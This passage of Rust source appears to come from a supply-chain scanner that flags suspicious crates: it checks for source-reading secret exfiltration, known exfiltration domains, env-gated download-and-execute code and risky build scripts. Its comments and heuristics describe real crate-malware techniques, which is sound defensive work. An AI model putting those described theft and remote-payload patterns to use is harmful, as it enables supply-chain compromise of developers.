916    // MAX_DIR_ENTRIES cap applies. Taking one more than the whole-walk cap is
917    // always enough (the walk stops at MAX_DIR_ENTRIES total anyway), so for any
918    // real crate (far fewer files) every entry is still collected and the sort is
919    // fully deterministic; only a pathological directory is truncated, where
920    // reproducibility is moot.
921    let mut entries: Vec<_> = rd
922        .flatten()
923        .take(crate::safety::MAX_DIR_ENTRIES.saturating_add(1))
924        .collect();
925    entries.sort_by_key(|e| e.file_name());
926    entries
927}
928
929/// Scan a crate's `src` tree (read-only, bounded, symlink-safe) for the runtime
930/// secret-exfiltration fingerprint.
931fn scan_source_exfil(crate_dir: &Path) -> Option<ExfilScan> {
932    use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
933    let mut found = ExfilScan::default();
934    let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
935        vec![(crate_dir.join("src"), 0)]
936    } else {
937        vec![(crate_dir.to_path_buf(), 0)]
938    };
939    let mut visited = 0usize;
940    'walk: while let Some((dir, depth)) = stack.pop() {
941        for entry in sorted_dir_entries(&dir) {
942            if visited >= MAX_DIR_ENTRIES {
943                // Terminate the whole walk at the cap (not just this dir), matching
944                // count_unsafe — avoids a wasted read_dir per remaining stacked dir.
945                break 'walk;
946            }
947            visited += 1;
948            let Ok(ft) = entry.file_type() else { continue };
949            if ft.is_symlink() {
950                continue;
951            }
952            let path = entry.path();
953            if ft.is_dir() {
954                if depth < MAX_DIR_DEPTH {
955                    stack.push((path, depth + 1));
956                }
957                continue;
958            }
959            if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
960                if let Some(c) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES) {
961                    let scans = c.contains("\".rs\"") && SOURCE_SCAN.iter().any(|m| c.contains(m));
962                    let net = BUILD_RS_NETWORK.iter().any(|m| c.contains(m));
963                    let sec = SECRET_MARKERS.iter().any(|m| c.contains(m));
964                    // A pure exfil host is suspicious on its own; a dual-use service
965                    // API only when the same file also handles secret material.
966                    let domain_here =
967                        EXFIL_HOST_DOMAINS
968                            .iter()
969                            .find(|d| c.contains(**d))
970                            .or_else(|| {
971                                sec.then(|| DUAL_USE_EXFIL_DOMAINS.iter().find(|d| c.contains(**d)))
972                                    .flatten()
973                            });
974                    // Env-gated remote payload (rustdecimal, 2022): the env-var gate,
975                    // the network fetch, and the process spawn must be causally tight
976                    // (one block/function), not merely co-present somewhere in a large
977                    // file — see `env_gated_block`.
978                    let env_gated = env_gated_block(&c);
979                    // faster_log/async_println conjunction must hold in ONE file:
980                    // a file that both reads the project's `.rs` files and reaches
981                    // the network or handles secrets. (Crate-wide OR would falsely
982                    // fire on a codegen helper + an unrelated HTTP client.)
983                    if scans && (net || sec) && found.source_exfil_sample.is_none() {
984                        found.source_exfil_sample = Some(path.clone());
985                        found.source_exfil_network = net;
986                        found.source_exfil_secrets = sec;
987                    }
988                    if let Some(d) = domain_here {
989                        if found.exfil_domain.is_none() {
990                            found.exfil_domain = Some((*d).to_string());
991                        }
992                        if found.domain_sample.is_none() {
993                            found.domain_sample = Some(path.clone());
994                        }
995                    }
996                    if env_gated && found.env_gated_sample.is_none() {
997                        found.env_gated_sample = Some(path.clone());
998                    }
999                }
1000            }
1001        }
1002    }
1003    found.any_match().then_some(found)
1004}
1005
1006/// Build the `suspicious_source_exfil` signal if a crate's runtime source both
1007/// scans the project's `.rs` files AND either exfiltrates over the network or
1008/// references secret/wallet material — the live crypto-stealer crate pattern.
1009fn source_exfil_signal(package: &str, network: bool, secrets: bool, path: String) -> RiskSignal {
1010    let mut what = Vec::new();
1011    if network {
1012        what.push("exfiltrates over the network");
1013    }
1014    if secrets {
1015        what.push("references wallet/private-key material");
1016    }
1017    RiskSignal {
1018        id: "suspicious_source_exfil".into(),
1019        package: package.to_string(),
1020        severity: Severity::High,
1021        weight: 26,
1022        confidence: 0.6,
1023        evidence: vec![
1024            Evidence::with_path(
1025                "source",
1026                path,
1027                "runtime source scans the project's `.rs` files (scanned statically, never executed)",
1028            ),
1029            Evidence::new(
1030                "heuristic",
1031                format!("…and {} — matches the faster_log/async_println crypto-stealer pattern", what.join(" and ")),
1032            ),
1033        ],
1034        recommendation:
1035            "A dependency that reads your source files and exfiltrates/handles secrets is almost \
1036             certainly malicious. Do not build it; report it to the registry."
1037                .into(),
1038    }
1039}
1040
1041/// Build a `suspicious_exfil_domain` signal when a crate's runtime source
1042/// hard-codes a domain from a known data-exfiltration class. Unlike
1043/// `suspicious_source_exfil` this does **not** require the crate to read the
1044/// project's `.rs` files — the faster_log stealer harvested keys from *log*
1045/// files and shipped them to a `*.workers.dev` endpoint, which the source-scan
1046/// fingerprint alone would miss.
1047fn exfil_domain_signal(package: &str, domain: &str, path: String) -> RiskSignal {
1048    RiskSignal {
1049        id: "suspicious_exfil_domain".into(),
1050        package: package.to_string(),
1051        severity: Severity::Medium,
1052        weight: 18,
1053        confidence: 0.5,
1054        evidence: vec![Evidence::with_path(
1055            "source",
1056            path,
1057            format!(
1058                "runtime source references `{domain}`, a domain class commonly used for data exfiltration (scanned statically, never executed)"
1059            ),
1060        )],
1061        recommendation:
1062            "Confirm why this dependency contacts that endpoint. Cloudflare Workers, Telegram, \
1063             IP-geolocation and paste/webhook services are common exfiltration channels — the \
1064             faster_log crypto-stealer (Sept 2025) shipped harvested keys to a `*.workers.dev` URL."
1065                .into(),
1066    }
1067}
1068
1069/// Build an `env_gated_payload` signal: a runtime file that reads an environment
1070/// variable, fetches over the network, and spawns a process — the rustdecimal
1071/// (2022) fingerprint, where the malicious `Decimal::new` checked `GITLAB_CI`,
1072/// downloaded a binary, and executed it. Read statically, never run.
1073fn env_gated_payload_signal(package: &str, path: String) -> RiskSignal {
1074    RiskSignal {
1075        id: "env_gated_payload".into(),
1076        package: package.to_string(),
1077        severity: Severity::High,
1078        weight: 24,
1079        confidence: 0.5,
1080        evidence: vec![Evidence::with_path(
1081            "source",
1082            path,
1083            "runtime source reads an environment variable, makes a network request, and spawns a \
1084             process — the env-gated remote-payload pattern (scanned statically, never executed)",
1085        )],
1086        recommendation:
1087            "A dependency that gates a download-and-execute on an environment variable (e.g. a CI \
1088             flag) is the rustdecimal supply-chain pattern. Review this code before building; \
1089             report it if it is not yours."
1090                .into(),
1091    }
1092}
1093
1094/// Build an optional `build_script_suspicious` signal from a build.rs body.
1095pub(crate) fn build_script_intent_signal(
1096    package: &str,
1097    content: &str,
1098    path: String,
1099) -> Option<RiskSignal> {
1100    let net: Vec<&str> = BUILD_RS_NETWORK
1101        .iter()
1102        .copied()
1103        .filter(|m| content.contains(*m))
1104        .collect();
1105    let payload: Vec<&str> = BUILD_RS_PAYLOAD
1106        .iter()
1107        .copied()
1108        .filter(|m| content.contains(*m))
1109        .collect();
1110
1111    if net.is_empty() && payload.is_empty() {
1112        return None;
1113    }
1114
1115    let (severity, weight) = if !net.is_empty() {
1116        (Severity::High, 28)
1117    } else {
1118        (Severity::Medium, 16)
1119    };
1120
1121    let mut evidence = vec![Evidence::with_path(
1122        "source",
1123        path,
1124        "build.rs shows anomalous intent (scanned statically, never executed)",
1125    )];
1126    if !net.is_empty() {
1127        evidence.push(Evidence::new(
1128            "heuristic",
1129            format!("network access in build script: {}", net.join(", ")),
1130        ));
1131    }
1132    if !payload.is_empty() {
1133        evidence.push(Evidence::new(
1134            "heuristic",
1135            format!("embedded payload / dynamic loading: {}", payload.join(", ")),
1136        ));
1137    }
1138
1139    Some(RiskSignal {
1140        id: "build_script_suspicious".into(),
1141        package: package.to_string(),
1142        severity,
1143        weight,
1144        confidence: 0.8,
1145        evidence,
1146        recommendation:
1147            "A build script that reaches the network or unpacks an opaque payload is a known \
1148             malware vector. Manually review build.rs before building this crate."
1149                .into(),
1150    })
1151}
1152
/// Built-in known-good baseline: ubiquitous, widely-audited platform/ecosystem
/// crates, plus established crates whose names sit one edit from a popular
/// crate.
///
/// Heuristic findings for these crates (FFI name, build script, unsafe,
/// duplicate versions) are kept for transparency but contribute zero weight,
/// so they never dominate the score. Advisory matches against these crates are
/// NEVER suppressed; `apply_known_good_baseline` holds the full list of signal
/// ids that are exempt from the downgrade.
///
/// Names are compared exactly (case-sensitive) by `is_known_good`.
///
/// NOTE(review): `apply_known_good_baseline` never rewrites
/// `possible_typosquat`, so the near-name group at the end presumably takes
/// effect inside the typosquat detector itself — confirm against that code.
pub const KNOWN_GOOD_CRATES: &[&str] = &[
    // Core platform / std-adjacent
    "libc",
    "windows-sys",
    "windows-targets",
    "windows_aarch64_gnullvm",
    "windows_aarch64_msvc",
    "windows_i686_gnu",
    "windows_i686_gnullvm",
    "windows_i686_msvc",
    "windows_x86_64_gnu",
    "windows_x86_64_gnullvm",
    "windows_x86_64_msvc",
    "linux-raw-sys",
    "core-foundation-sys",
    "errno",
    // wasm / web
    "js-sys",
    "web-sys",
    "wasm-bindgen",
    "wasm-bindgen-backend",
    "wasm-bindgen-shared",
    // ubiquitous low-level utilities
    "bitflags",
    "cfg-if",
    "memchr",
    "once_cell",
    "smallvec",
    "rustix",
    "getrandom",
    // Legit, established crates (>=100k downloads) that sit one edit from a
    // popular crate; confirmed non-typosquats from a full crates.io db-dump scan.
    "base62",
    "bhttp",
    "boml",
    "byte",
    "cfg-iif",
    "chttp",
    "clamp",
    "cmac",
    "coap",
    "cuid",
    "ehttp",
    "ghash",
    "httm",
    "http2",
    "hyper2",
    "hyperx",
    "hypher",
    "idea",
    "index-map",
    "iter_tools",
    "lhash",
    "lib0",
    "libm",
    "manyhow",
    "mise",
    "nbytes",
    "nuid",
    "objekt",
    "ohttp",
    "openssh",
    "pastel",
    "pastey",
    "pasts",
    "ping",
    "pmac",
    "rbase64",
    "rend",
    "rinf",
    "rlibc",
    "rustis",
    "rxing",
    "serde_json5",
    "serde_yaml2",
    "serde_yml",
    "sha-1",
    "shaq",
    "socket",
    "str0m",
    "tdigest",
    "temp-file",
    "tide",
    "timer",
    "tokio-utils",
    "tomlq",
    "uguid",
    "ulid",
    "utime",
    "uuid7",
];
1248
1249/// Whether a crate is on the built-in known-good baseline (case-sensitive,
1250/// matches crate names as they appear in `Cargo.lock`).
1251pub fn is_known_good(name: &str) -> bool {
1252    KNOWN_GOOD_CRATES.contains(&name)
1253}
1254
1255/// Downgrade heuristic (non-advisory) findings for known-good crates to Info /
1256/// zero weight, appending a note. Advisory findings are left untouched.
1257fn apply_known_good_baseline(signals: &mut [RiskSignal]) {
1258    for signal in signals.iter_mut() {
1259        // Advisory matches, yanked status, *suspicious* build scripts, typosquats,
1260        // ownership changes and the malware / dependency-confusion source signals
1261        // are strong evidence, never suppressed by the baseline. Ownership change
1262        // and source substitution in particular MUST survive: the xz and
1263        // event-stream takeovers and dependency-confusion attacks all target
1264        // ubiquitous, "known-good" crates — silencing them there blinds the signal
1265        // to its main target.
1266        if signal.id.starts_with("advisory_")
1267            || signal.id == "yanked_crate"
1268            || signal.id == "build_script_suspicious"
1269            || signal.id == "suspicious_source_exfil"
1270            || signal.id == "suspicious_exfil_domain"
1271            || signal.id == "env_gated_payload"
1272            || signal.id == "possible_typosquat"
1273            || signal.id == "owners_changed"
1274            || signal.id == "source_substitution"
1275            || signal.id == "denied_crate"
1276        {
1277            continue;
1278        }
1279        let name = signal.package.split('@').next().unwrap_or(&signal.package);
1280        if is_known_good(name) {
1281            signal.severity = Severity::Info;
1282            signal.weight = 0;
1283            signal.evidence.push(Evidence::new(
1284                "baseline",
1285                "crate is on the rustinel known-good baseline (ubiquitous platform/ecosystem crate); not counted toward risk",
1286            ));
1287        }
1288    }
1289}
1290
1291/// Read-only source/metadata scanning for crates we can find on disk.
1292fn collect_source_signals(
1293    lock: &LockfileModel,
1294    source_root: &Path,
1295    signals: &mut Vec<RiskSignal>,
1296) -> Result<(), RustinelError> {
1297    for package in lock.registry_packages() {
1298        let Some(crate_dir) = locate_crate_dir(source_root, package) else {
1299            continue;
1300        };
1301
1302        // build.rs detection — file presence only, never executed.
1303        let build_rs = crate_dir.join("build.rs");
1304        if build_rs.is_file() {
1305            signals.push(RiskSignal {
1306                id: "build_script_present".into(),
1307                package: package.id.to_string(),
1308                // Presence of a build script is ubiquitous and informational; the
1309                // *intent* scan (build_script_suspicious) carries the real weight.
1310                severity: Severity::Low,
1311                weight: 2,
1312                confidence: 0.95,
1313                evidence: vec![Evidence::with_path(
1314                    "file",
1315                    rel_display(source_root, &build_rs),
1316                    "build.rs exists; the file was inspected statically and never executed",
1317                )],
1318                recommendation: "Review the build script before merging.".into(),
1319            });
1320
1321            // Static *intent* scan of the build script. A build.rs that reaches
1322            // the network or embeds an opaque payload is highly anomalous and is
1323            // the exact vector used by recent malicious crates — never executed,
1324            // only read.
1325            if let Some(content) =
1326                crate::safety::read_file_capped(&build_rs, crate::safety::MAX_SOURCE_FILE_BYTES)
1327            {
1328                if let Some(sig) = build_script_intent_signal(
1329                    &package.id.to_string(),
1330                    &content,
1331                    rel_display(source_root, &build_rs),
1332                ) {
1333                    signals.push(sig);
1334                }
1335            }
1336        }
1337
1338        // Manifest signals: native `links`, declared license.
1339        let manifest = crate_dir.join("Cargo.toml");
1340        if let Some(meta) = read_manifest(&manifest) {
1341            if let Some(links) = meta.links {
1342                // Manifest-confirmed native linkage is a stronger signal than the
1343                // name heuristic: escalate severity/weight and confidence.
1344                if let Some(existing) = signals
1345                    .iter_mut()
1346                    .find(|s| s.id == "native_ffi_detected" && s.package == package.id.to_string())
1347                {
1348                    existing.severity = Severity::Medium;
1349                    existing.weight = 14;
1350                    existing.confidence = 0.95;
1351                    existing.evidence.push(Evidence::with_path(
1352                        "manifest",
1353                        rel_display(source_root, &manifest),
1354                        format!("manifest declares `links = \"{links}\"`"),
1355                    ));
1356                } else {
1357                    signals.push(RiskSignal {
1358                        id: "native_ffi_detected".into(),
1359                        package: package.id.to_string(),
1360                        severity: Severity::Medium,
1361                        weight: 14,
1362                        confidence: 0.9,
1363                        evidence: vec![Evidence::with_path(
1364                            "manifest",
1365                            rel_display(source_root, &manifest),
1366                            format!("manifest declares `links = \"{links}\"`"),
1367                        )],
1368                        recommendation:
1369                            "Review the native dependency and its build process before merging."
1370                                .into(),
1371                    });
1372                }
1373            }
1374
1375            signals.push(license_signal(
1376                package,
1377                meta.license.as_deref(),
1378                &manifest,
1379                source_root,
1380            ));
1381        }
1382
1383        // unsafe usage — static, comment/string-aware count across src/*.rs.
1384        // `unsafe` is ubiquitous and is NOT a vulnerability by itself, so it
1385        // carries little score weight (cargo-geiger philosophy); it stays visible.
1386        if let Some((stats, sample)) = count_unsafe(&crate_dir) {
1387            if stats.total > 0 {
1388                let (severity, weight) = if stats.total >= 20 {
1389                    (Severity::Low, 3)
1390                } else {
1391                    (Severity::Low, 1)
1392                };
1393                signals.push(RiskSignal {
1394                    id: "unsafe_present".into(),
1395                    package: package.id.to_string(),
1396                    severity,
1397                    weight,
1398                    confidence: 0.8,
1399                    evidence: vec![Evidence::with_path(
1400                        "source",
1401                        rel_display(source_root, &sample),
1402                        format!(
1403                            "{} `unsafe` usage(s) found by static scan (comments and strings ignored). \
1404                             Use of `unsafe` is not automatically a vulnerability; it indicates code that warrants review.",
1405                            stats.breakdown()
1406                        ),
1407                    )],
1408                    recommendation:
1409                        "Confirm that `unsafe` blocks are justified and reviewed. This is informational, not a vulnerability."
1410                            .into(),
1411                });
1412            }
1413        }
1414
1415        // Runtime secret-exfiltration fingerprint (faster_log/async_println class).
1416        // Each signal cites its OWN matching file (scan.*_sample), not one shared
1417        // path — otherwise an env-gated payload in file B could be attributed to
1418        // file A which merely held the exfil domain.
1419        if let Some(scan) = scan_source_exfil(&crate_dir) {
1420            if let Some(s) = &scan.source_exfil_sample {
1421                signals.push(source_exfil_signal(
1422                    &package.id.to_string(),
1423                    scan.source_exfil_network,
1424                    scan.source_exfil_secrets,
1425                    rel_display(source_root, s),
1426                ));
1427            }
1428            // Exfil-domain reputation: fires even when the crate does not read the
1429            // project's `.rs` files (faster_log harvested *log* files).
1430            if let (Some(domain), Some(s)) = (scan.exfil_domain.as_deref(), &scan.domain_sample) {
1431                signals.push(exfil_domain_signal(
1432                    &package.id.to_string(),
1433                    domain,
1434                    rel_display(source_root, s),
1435                ));
1436            }
1437            // Env-gated remote payload (rustdecimal, 2022): env var + network + spawn.
1438            if let Some(s) = &scan.env_gated_sample {
1439                signals.push(env_gated_payload_signal(
1440                    &package.id.to_string(),
1441                    rel_display(source_root, s),
1442                ));
1443            }
1444        }
1445    }
1446    Ok(())
1447}
1448
1449fn license_signal(
1450    package: &Package,
1451    license: Option<&str>,
1452    manifest: &Path,
1453    source_root: &Path,
1454) -> RiskSignal {
1455    match license {
1456        Some(license) => RiskSignal {
1457            id: "license_detected".into(),
1458            package: package.id.to_string(),
1459            severity: Severity::Info,
1460            weight: 0,
1461            confidence: 1.0,
1462            evidence: vec![Evidence::with_path(
1463                "manifest",
1464                rel_display(source_root, manifest),
1465                format!("declared license: {license}"),
1466            )],
1467            recommendation: "Confirm the license is allowed by your organization policy.".into(),
1468        },
1469        None => RiskSignal {
1470            id: "license_unknown".into(),
1471            package: package.id.to_string(),
1472            severity: Severity::Low,
1473            weight: 4,
1474            confidence: 0.9,
1475            evidence: vec![Evidence::with_path(
1476                "manifest",
1477                rel_display(source_root, manifest),
1478                "no `license` or `license-file` field found in the manifest",
1479            )],
1480            recommendation: "Determine the crate's license before depending on it.".into(),
1481        },
1482    }
1483}
1484
1485/// Minimal manifest fields we care about. Parsed read-only.
1486struct ManifestMeta {
1487    links: Option<String>,
1488    license: Option<String>,
1489}
1490
1491fn read_manifest(path: &Path) -> Option<ManifestMeta> {
1492    let content = crate::safety::read_file_capped(path, crate::safety::MAX_SOURCE_FILE_BYTES)?;
1493    let value: toml::Value = toml::from_str(&content).ok()?;
1494    let package = value.get("package")?;
1495    let links = package
1496        .get("links")
1497        .and_then(|v| v.as_str())
1498        .map(|s| s.to_string());
1499    let license = package
1500        .get("license")
1501        .and_then(|v| v.as_str())
1502        .map(|s| s.to_string())
1503        .or_else(|| {
1504            package
1505                .get("license-file")
1506                .and_then(|v| v.as_str())
1507                .map(|f| format!("file:{f}"))
1508        });
1509    Some(ManifestMeta { links, license })
1510}
1511
1512/// Count `unsafe` tokens across the crate's `src` tree. Returns the count plus a
1513/// representative file for evidence.
1514///
1515/// Hardened traversal: symlinks are never followed (so an attacker-planted
1516/// symlink cannot redirect the scan to `/etc/shadow`), recursion depth and
1517/// total entries are bounded, and each file read is size-capped.
1518fn count_unsafe(crate_dir: &Path) -> Option<(UnsafeStats, PathBuf)> {
1519    use crate::safety::{MAX_DIR_DEPTH, MAX_DIR_ENTRIES, MAX_SOURCE_FILE_BYTES};
1520
1521    let mut total = UnsafeStats::default();
1522    let mut sample: Option<PathBuf> = None;
1523    // (dir, depth)
1524    let mut stack: Vec<(PathBuf, usize)> = if crate_dir.join("src").is_dir() {
1525        vec![(crate_dir.join("src"), 0)]
1526    } else {
1527        vec![(crate_dir.to_path_buf(), 0)]
1528    };
1529
1530    let mut visited = 0usize;
1531    while let Some((dir, depth)) = stack.pop() {
1532        for entry in sorted_dir_entries(&dir) {
1533            if visited >= MAX_DIR_ENTRIES {
1534                return sample.map(|s| (total, s));
1535            }
1536            visited += 1;
1537            // file_type() from a DirEntry does NOT follow symlinks.
1538            let Ok(ft) = entry.file_type() else { continue };
1539            if ft.is_symlink() {
1540                continue; // never traverse or read through symlinks
1541            }
1542            let path = entry.path();
1543            if ft.is_dir() {
1544                if depth < MAX_DIR_DEPTH {
1545                    stack.push((path, depth + 1));
1546                }
1547                continue;
1548            }
1549            if ft.is_file() && path.extension().and_then(|e| e.to_str()) == Some("rs") {
1550                if let Some(content) = crate::safety::read_file_capped(&path, MAX_SOURCE_FILE_BYTES)
1551                {
1552                    let stats = scan_unsafe(&content);
1553                    if stats.total > 0 {
1554                        if sample.is_none() {
1555                            sample = Some(path.clone());
1556                        }
1557                        total.add(&stats);
1558                    }
1559                }
1560            }
1561        }
1562    }
1563    sample.map(|s| (total, s))
1564}
1565
/// Per-construct tally of `unsafe` usage, so a finding can *contextualize* the
/// number rather than just report it (a gap noted vs cargo-geiger).
#[derive(Debug, Default, Clone, Copy)]
pub(crate) struct UnsafeStats {
    /// Every counted `unsafe`.
    total: usize,
    /// Tally reported under the `fn` label.
    fns: usize,
    /// Tally reported under the `impl` label.
    impls: usize,
    /// Tally reported under the `trait` label.
    traits: usize,
    /// Tally reported under the `block` label.
    blocks: usize,
}

impl UnsafeStats {
    /// Fold another tally into this one, field by field.
    fn add(&mut self, o: &UnsafeStats) {
        let UnsafeStats {
            total,
            fns,
            impls,
            traits,
            blocks,
        } = *o;
        self.total += total;
        self.fns += fns;
        self.impls += impls;
        self.traits += traits;
        self.blocks += blocks;
    }

    /// Render as "12 (3 fn, 1 impl, 8 block)". Categories with a zero count
    /// are left out; with no non-zero category only the total is printed.
    fn breakdown(&self) -> String {
        let labelled = [
            (self.fns, "fn"),
            (self.impls, "impl"),
            (self.traits, "trait"),
            (self.blocks, "block"),
        ];
        let parts: Vec<String> = labelled
            .iter()
            .filter(|(count, _)| *count > 0)
            .map(|(count, label)| format!("{count} {label}"))
            .collect();

        match parts.as_slice() {
            [] => self.total.to_string(),
            _ => format!("{} ({})", self.total, parts.join(", ")),
        }
    }
}
1608
1609/// Count `unsafe` keywords in real code, ignoring comments and string/raw-string
1610/// literals (so `unsafe` in a doc comment or string is not counted), and
1611/// categorize each by the construct that follows (`fn`/`impl`/`trait`/block).
1612///
1613/// A small hand lexer — deliberately not a full parser, never executes anything,
1614/// and is bounded by the caller's file-size cap. Unrecognized exotic syntax can
1615/// only mis-count slightly; it can never panic.
1616pub(crate) fn scan_unsafe(src: &str) -> UnsafeStats {
1617    let b = src.as_bytes();
1618    let n = b.len();
1619    let mut stats = UnsafeStats::default();
1620    let mut i = 0;
1621
1622    enum State {
1623        Normal,
1624        Line,
1625        Block(usize),
1626        Str,
1627        Raw(usize),
1628    }
1629    let mut st = State::Normal;
1630
1631    while i < n {
1632        match st {
1633            State::Normal => {
1634                if b[i] == b'/' && i + 1 < n && b[i + 1] == b'/' {
1635                    st = State::Line;
1636                    i += 2;
1637                } else if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1638                    st = State::Block(1);
1639                    i += 2;
1640                } else if let Some((hashes, skip)) = raw_string_start(b, i) {
1641                    st = State::Raw(hashes);
1642                    i += skip;
1643                } else if b[i] == b'"' {
1644                    st = State::Str;
1645                    i += 1;
1646                } else if b[i] == b'\'' {
1647                    i += char_literal_len(b, i); // skip char literals (>=1)
1648                } else if b[i] == b'u' && matches_unsafe(b, i) {
1649                    stats.total += 1;
1650                    categorize(b, i + 6, &mut stats);
1651                    i += 6;
1652                } else {
1653                    i += 1;
1654                }
1655            }
1656            State::Line => {
1657                if b[i] == b'\n' {
1658                    st = State::Normal;
1659                }
1660                i += 1;
1661            }
1662            State::Block(d) => {
1663                if b[i] == b'/' && i + 1 < n && b[i + 1] == b'*' {
1664                    st = State::Block(d + 1);
1665                    i += 2;
1666                } else if b[i] == b'*' && i + 1 < n && b[i + 1] == b'/' {
1667                    st = if d == 1 {
1668                        State::Normal
1669                    } else {
1670                        State::Block(d - 1)
1671                    };
1672                    i += 2;
1673                } else {
1674                    i += 1;
1675                }
1676            }
1677            State::Str => {
1678                if b[i] == b'\\' {
1679                    i += 2;
1680                } else {
1681                    if b[i] == b'"' {
1682                        st = State::Normal;
1683                    }
1684                    i += 1;
1685                }
1686            }
1687            State::Raw(h) => {
1688                if b[i] == b'"' && i + 1 + h <= n && b[i + 1..i + 1 + h].iter().all(|&c| c == b'#')
1689                {
1690                    st = State::Normal;
1691                    i += 1 + h;
1692                } else {
1693                    i += 1;
1694                }
1695            }
1696        }
1697    }
1698    stats
1699}
1700
1701/// `unsafe` as a whole word at position `i`.
1702fn matches_unsafe(b: &[u8], i: usize) -> bool {
1703    if i + 6 > b.len() || &b[i..i + 6] != b"unsafe" {
1704        return false;
1705    }
1706    let before_ok = i == 0 || !is_ident_byte(b[i - 1]);
1707    let after_ok = i + 6 >= b.len() || !is_ident_byte(b[i + 6]);
1708    before_ok && after_ok
1709}
1710
1711/// Classify the construct after an `unsafe` keyword (whitespace-skipped).
1712fn categorize(b: &[u8], mut j: usize, stats: &mut UnsafeStats) {
1713    while j < b.len() && b[j].is_ascii_whitespace() {
1714        j += 1;
1715    }
1716    let starts = |kw: &[u8]| -> bool {
1717        j + kw.len() <= b.len()
1718            && &b[j..j + kw.len()] == kw
1719            && (j + kw.len() == b.len() || !is_ident_byte(b[j + kw.len()]))
1720    };
1721    if starts(b"fn") {
1722        stats.fns += 1;
1723    } else if starts(b"impl") {
1724        stats.impls += 1;
1725    } else if starts(b"trait") {
1726        stats.traits += 1;
1727    } else {
1728        stats.blocks += 1;
1729    }
1730}
1731
1732/// If a raw-string literal (`r"`, `r#"`, `br##"`, …) starts at `i`, return its
1733/// hash count and the number of bytes to skip to land after the opening quote.
1734fn raw_string_start(b: &[u8], i: usize) -> Option<(usize, usize)> {
1735    // Must be a token start: preceded by a non-identifier byte.
1736    if i > 0 && is_ident_byte(b[i - 1]) {
1737        return None;
1738    }
1739    let mut p = i;
1740    if b.get(p) == Some(&b'b') {
1741        p += 1; // byte raw string
1742    }
1743    if b.get(p) != Some(&b'r') {
1744        return None;
1745    }
1746    p += 1;
1747    let hash_start = p;
1748    while b.get(p) == Some(&b'#') {
1749        p += 1;
1750    }
1751    if b.get(p) == Some(&b'"') {
1752        let hashes = p - hash_start;
1753        Some((hashes, p - i + 1)) // skip through the opening quote
1754    } else {
1755        None
1756    }
1757}
1758
/// Byte length of a char literal starting at `i` (`'a'`, `'é'`, `'\n'`,
/// `'\''`, `'\u{1F}'`), or 1 if it is actually a lifetime (`'a`) or not a
/// literal at all — so the caller always advances by at least one byte.
///
/// `b[i]` is expected to be the opening `'`.
fn char_literal_len(b: &[u8], i: usize) -> usize {
    match b.get(i + 1) {
        Some(&b'\\') => {
            // The byte right after the backslash is the escaped character
            // itself and may be a quote (`'\''`), so the closing quote is only
            // looked for from `i + 3` on. The window is bounded: the longest
            // escape, `'\u{10FFFF}'`, is 12 bytes.
            let end = (i + 12).min(b.len());
            (i + 3..end)
                .find(|&p| b[p] == b'\'')
                .map_or(1, |p| p - i + 1)
        }
        // `''` is not a literal, and a lone trailing `'` has nothing to skip.
        Some(&b'\'') | None => 1,
        Some(&lead) => {
            // Width of the (possibly multi-byte UTF-8) scalar after the quote,
            // taken from its leading byte.
            let width = match lead {
                0xC0..=0xDF => 2,
                0xE0..=0xEF => 3,
                0xF0..=0xF7 => 4,
                _ => 1,
            };
            if b.get(i + 1 + width) == Some(&b'\'') {
                width + 2 // opening quote + scalar + closing quote
            } else {
                1 // lifetime or unknown
            }
        }
    }
}
1781
/// Whether `b` can be part of an ASCII identifier (letter, digit or `_`).
fn is_ident_byte(b: u8) -> bool {
    matches!(b, b'_' | b'0'..=b'9' | b'a'..=b'z' | b'A'..=b'Z')
}
1785
1786/// Find a crate's on-disk directory under a source root, supporting both the
1787/// flat fixture layout (`<root>/<name>-<version>`) and the real Cargo registry
1788/// src layout (`<root>/<registry>/<name>-<version>`).
1789///
1790/// Hardened against path traversal: the crate name and version come from an
1791/// untrusted lockfile, so they are validated to be safe single path segments
1792/// (no `/`, `\`, `..`, NUL) and the resolved directory is verified to be
1793/// canonically contained within `source_root`.
1794fn locate_crate_dir(source_root: &Path, package: &Package) -> Option<PathBuf> {
1795    use crate::safety::{
1796        is_contained_within, is_safe_crate_name, is_safe_path_segment, is_safe_version,
1797    };
1798
1799    if !is_safe_crate_name(&package.id.name) || !is_safe_version(&package.id.version) {
1800        return None;
1801    }
1802    let dir_name = format!("{}-{}", package.id.name, package.id.version);
1803    if !is_safe_path_segment(&dir_name) {
1804        return None;
1805    }
1806
1807    let verify = |candidate: PathBuf| -> Option<PathBuf> {
1808        // Must be a real directory (not a symlink) AND inside source_root.
1809        let meta = std::fs::symlink_metadata(&candidate).ok()?;
1810        if !meta.file_type().is_dir() {
1811            return None;
1812        }
1813        if is_contained_within(source_root, &candidate) {
1814            Some(candidate)
1815        } else {
1816            None
1817        }
1818    };
1819
1820    if let Some(dir) = verify(source_root.join(&dir_name)) {
1821        return Some(dir);
1822    }
1823    // One level of nesting (e.g. registry index hash dir). Sorted so that, if the
1824    // same `name-version` dir exists under more than one nesting parent (e.g. two
1825    // registry index hashes), the chosen crate dir — and thus every evidence path
1826    // derived from it — is reproducible across filesystems.
1827    for entry in sorted_dir_entries(source_root) {
1828        let Ok(ft) = entry.file_type() else { continue };
1829        if !ft.is_dir() {
1830            continue; // skip symlinks and files
1831        }
1832        if let Some(dir) = verify(entry.path().join(&dir_name)) {
1833            return Some(dir);
1834        }
1835    }
1836    None
1837}
1838
/// Render `path` relative to `root` for display; when `path` is not below
/// `root` it is shown unchanged.
fn rel_display(root: &Path, path: &Path) -> String {
    let shown = match path.strip_prefix(root) {
        Ok(relative) => relative,
        Err(_) => path,
    };
    shown.display().to_string()
}
1845
1846#[cfg(test)]
1847mod tests {
1848    use super::*;
1849    use crate::lockfile::PackageId;
1850
1851    fn pkg(name: &str, version: &str, local: bool) -> Package {
1852        Package {
1853            id: PackageId {
1854                name: name.into(),
1855                version: version.into(),
1856                source: if local {
1857                    None
1858                } else {
1859                    Some("registry+https://github.com/rust-lang/crates.io-index".into())
1860                },
1861            },
1862            checksum: None,
1863            dependencies: vec![],
1864        }
1865    }
1866
1867    fn lock(packages: Vec<Package>) -> LockfileModel {
1868        LockfileModel {
1869            path: PathBuf::from("Cargo.lock"),
1870            version: Some(3),
1871            packages,
1872        }
1873    }
1874
